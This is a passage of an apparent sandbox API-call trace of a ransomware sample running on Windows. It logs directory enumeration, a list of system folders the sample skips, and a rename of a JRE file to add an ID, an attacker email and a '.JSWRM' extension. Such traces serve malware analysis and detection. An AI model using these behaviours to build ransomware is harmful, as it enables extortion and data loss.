lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x580, lpOverlapped=0x0) returned 1 [0069.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0069.755] CloseHandle (hObject=0x458) returned 1 [0069.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0069.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0069.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0069.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0069.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0069.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f4d0 [0069.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.756] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0069.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0069.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0069.756] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b1f9e6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b1f9e6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b1f9e6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x58f, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Xusage.txt", cAlternateFileName="")) returned 0 [0069.757] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0069.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0069.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0069.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0069.757] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="servertool.exe", cAlternateFileName="SERVER~1.EXE")) returned 1 [0069.757] lstrcmpiW (lpString1="servertool.exe", lpString2=".") returned 1 [0069.757] lstrcmpiW (lpString1="servertool.exe", lpString2="..") returned 1 [0069.757] lstrcmpiW (lpString1="servertool.exe", lpString2="...") returned 1 [0069.757] lstrcmpiW (lpString1="servertool.exe", lpString2="windows") returned -1 [0069.757] lstrcmpiW (lpString1="servertool.exe", lpString2="recovery") returned 1 [0069.757] lstrcmpiW (lpString1="servertool.exe", lpString2="perflogs") returned 1 [0069.757] lstrcmpiW (lpString1="servertool.exe", lpString2="documents and settings") returned 1 [0069.757] lstrcmpiW (lpString1="servertool.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.757] lstrcmpiW (lpString1="servertool.exe", lpString2="system volume information") returned -1 [0069.757] lstrcmpiW (lpString1="servertool.exe", lpString2="msocache") returned 1 [0069.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="servertool.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="servertool.exe", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="servertool.exe", lpUsedDefaultChar=0x0) returned 14 [0069.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="servertool.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="servertool.exe", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="servertool.exe", lpUsedDefaultChar=0x0) returned 14 [0069.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0069.757] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="splashscreen.dll", cAlternateFileName="SPLASH~1.DLL")) returned 1 [0069.757] lstrcmpiW (lpString1="splashscreen.dll", lpString2=".") returned 1 [0069.757] lstrcmpiW (lpString1="splashscreen.dll", lpString2="..") returned 1 [0069.757] lstrcmpiW (lpString1="splashscreen.dll", lpString2="...") returned 1 [0069.757] lstrcmpiW (lpString1="splashscreen.dll", lpString2="windows") returned -1 [0069.757] lstrcmpiW (lpString1="splashscreen.dll", lpString2="recovery") returned 1 [0069.757] lstrcmpiW (lpString1="splashscreen.dll", lpString2="perflogs") returned 1 [0069.757] lstrcmpiW (lpString1="splashscreen.dll", lpString2="documents and settings") returned 1 [0069.757] lstrcmpiW (lpString1="splashscreen.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.758] lstrcmpiW (lpString1="splashscreen.dll", lpString2="system volume information") returned -1 [0069.758] lstrcmpiW (lpString1="splashscreen.dll", lpString2="msocache") returned 1 [0069.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splashscreen.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splashscreen.dll", cchWideChar=16, lpMultiByteStr=0x241268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="splashscreen.dll", lpUsedDefaultChar=0x0) returned 16 [0069.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splashscreen.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0069.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splashscreen.dll", cchWideChar=16, lpMultiByteStr=0x241380, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="splashscreen.dll", lpUsedDefaultChar=0x0) returned 16 [0069.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0069.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.758] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8ba40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="ssv.dll", cAlternateFileName="")) returned 1 [0069.758] lstrcmpiW (lpString1="ssv.dll", lpString2=".") returned 1 [0069.758] lstrcmpiW (lpString1="ssv.dll", lpString2="..") returned 1 [0069.758] lstrcmpiW (lpString1="ssv.dll", lpString2="...") returned 1 [0069.758] lstrcmpiW (lpString1="ssv.dll", lpString2="windows") returned -1 [0069.758] lstrcmpiW (lpString1="ssv.dll", lpString2="recovery") returned 1 [0069.758] lstrcmpiW (lpString1="ssv.dll", lpString2="perflogs") returned 1 [0069.758] lstrcmpiW (lpString1="ssv.dll", lpString2="documents and settings") returned 1 [0069.758] lstrcmpiW (lpString1="ssv.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.758] lstrcmpiW (lpString1="ssv.dll", lpString2="system volume information") returned -1 [0069.758] lstrcmpiW (lpString1="ssv.dll", lpString2="msocache") returned 1 [0069.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssv.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssv.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ssv.dll", lpUsedDefaultChar=0x0) returned 7 [0069.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssv.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssv.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ssv.dll", lpUsedDefaultChar=0x0) returned 7 [0069.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0069.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.758] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="ssvagent.exe", cAlternateFileName="")) returned 1 [0069.759] lstrcmpiW (lpString1="ssvagent.exe", lpString2=".") returned 1 [0069.759] lstrcmpiW (lpString1="ssvagent.exe", lpString2="..") returned 1 [0069.759] lstrcmpiW (lpString1="ssvagent.exe", lpString2="...") returned 1 [0069.759] lstrcmpiW (lpString1="ssvagent.exe", lpString2="windows") returned -1 [0069.759] lstrcmpiW (lpString1="ssvagent.exe", lpString2="recovery") returned 1 [0069.759] lstrcmpiW (lpString1="ssvagent.exe", lpString2="perflogs") returned 1 [0069.759] lstrcmpiW (lpString1="ssvagent.exe", lpString2="documents and settings") returned 1 [0069.759] lstrcmpiW (lpString1="ssvagent.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.759] lstrcmpiW (lpString1="ssvagent.exe", lpString2="system volume information") returned -1 [0069.759] lstrcmpiW (lpString1="ssvagent.exe", lpString2="msocache") returned 1 [0069.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0069.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssvagent.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssvagent.exe", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ssvagent.exe", lpUsedDefaultChar=0x0) returned 12 [0069.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0069.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0069.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssvagent.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssvagent.exe", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ssvagent.exe", lpUsedDefaultChar=0x0) returned 12 [0069.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0069.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0069.759] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x21240, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="sunec.dll", cAlternateFileName="")) returned 1 [0069.759] lstrcmpiW (lpString1="sunec.dll", lpString2=".") returned 1 [0069.759] lstrcmpiW (lpString1="sunec.dll", lpString2="..") returned 1 [0069.759] lstrcmpiW (lpString1="sunec.dll", lpString2="...") returned 1 [0069.759] lstrcmpiW (lpString1="sunec.dll", lpString2="windows") returned -1 [0069.759] lstrcmpiW (lpString1="sunec.dll", lpString2="recovery") returned 1 [0069.759] lstrcmpiW (lpString1="sunec.dll", lpString2="perflogs") returned 1 [0069.759] lstrcmpiW (lpString1="sunec.dll", lpString2="documents and settings") returned 1 [0069.759] lstrcmpiW (lpString1="sunec.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.759] lstrcmpiW (lpString1="sunec.dll", lpString2="system volume information") returned -1 [0069.759] lstrcmpiW (lpString1="sunec.dll", lpString2="msocache") returned 1 [0069.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunec.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunec.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunec.dll", lpUsedDefaultChar=0x0) returned 9 [0069.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunec.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunec.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunec.dll", lpUsedDefaultChar=0x0) returned 9 [0069.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.760] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7c40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="sunmscapi.dll", cAlternateFileName="SUNMSC~1.DLL")) returned 1 [0069.760] lstrcmpiW (lpString1="sunmscapi.dll", lpString2=".") returned 1 [0069.760] lstrcmpiW (lpString1="sunmscapi.dll", lpString2="..") returned 1 [0069.760] lstrcmpiW (lpString1="sunmscapi.dll", lpString2="...") returned 1 [0069.760] lstrcmpiW (lpString1="sunmscapi.dll", lpString2="windows") returned -1 [0069.760] lstrcmpiW (lpString1="sunmscapi.dll", lpString2="recovery") returned 1 [0069.760] lstrcmpiW (lpString1="sunmscapi.dll", lpString2="perflogs") returned 1 [0069.760] lstrcmpiW (lpString1="sunmscapi.dll", lpString2="documents and settings") returned 1 [0069.760] lstrcmpiW (lpString1="sunmscapi.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.760] lstrcmpiW (lpString1="sunmscapi.dll", lpString2="system volume information") returned -1 [0069.760] lstrcmpiW (lpString1="sunmscapi.dll", lpString2="msocache") returned 1 [0069.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunmscapi.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunmscapi.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunmscapi.dll", lpUsedDefaultChar=0x0) returned 13 [0069.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0069.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunmscapi.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunmscapi.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunmscapi.dll", lpUsedDefaultChar=0x0) returned 13 [0069.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0069.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0069.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.760] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e440, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="t2k.dll", cAlternateFileName="")) returned 1 [0069.760] lstrcmpiW (lpString1="t2k.dll", lpString2=".") returned 1 [0069.760] lstrcmpiW (lpString1="t2k.dll", lpString2="..") returned 1 [0069.760] lstrcmpiW (lpString1="t2k.dll", lpString2="...") returned 1 [0069.761] lstrcmpiW (lpString1="t2k.dll", lpString2="windows") returned -1 [0069.761] lstrcmpiW (lpString1="t2k.dll", lpString2="recovery") returned 1 [0069.761] lstrcmpiW (lpString1="t2k.dll", lpString2="perflogs") returned 1 [0069.761] lstrcmpiW (lpString1="t2k.dll", lpString2="documents and settings") returned 1 [0069.761] lstrcmpiW (lpString1="t2k.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.761] lstrcmpiW (lpString1="t2k.dll", lpString2="system volume information") returned 1 [0069.761] lstrcmpiW (lpString1="t2k.dll", lpString2="msocache") returned 1 [0069.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="t2k.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="t2k.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t2k.dll", lpUsedDefaultChar=0x0) returned 7 [0069.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="t2k.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="t2k.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t2k.dll", lpUsedDefaultChar=0x0) returned 7 [0069.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0069.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0069.761] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="tnameserv.exe", cAlternateFileName="TNAMES~1.EXE")) returned 1 [0069.761] lstrcmpiW (lpString1="tnameserv.exe", lpString2=".") returned 1 [0069.761] lstrcmpiW (lpString1="tnameserv.exe", lpString2="..") returned 1 [0069.761] lstrcmpiW (lpString1="tnameserv.exe", lpString2="...") returned 1 [0069.761] lstrcmpiW (lpString1="tnameserv.exe", lpString2="windows") returned -1 [0069.761] 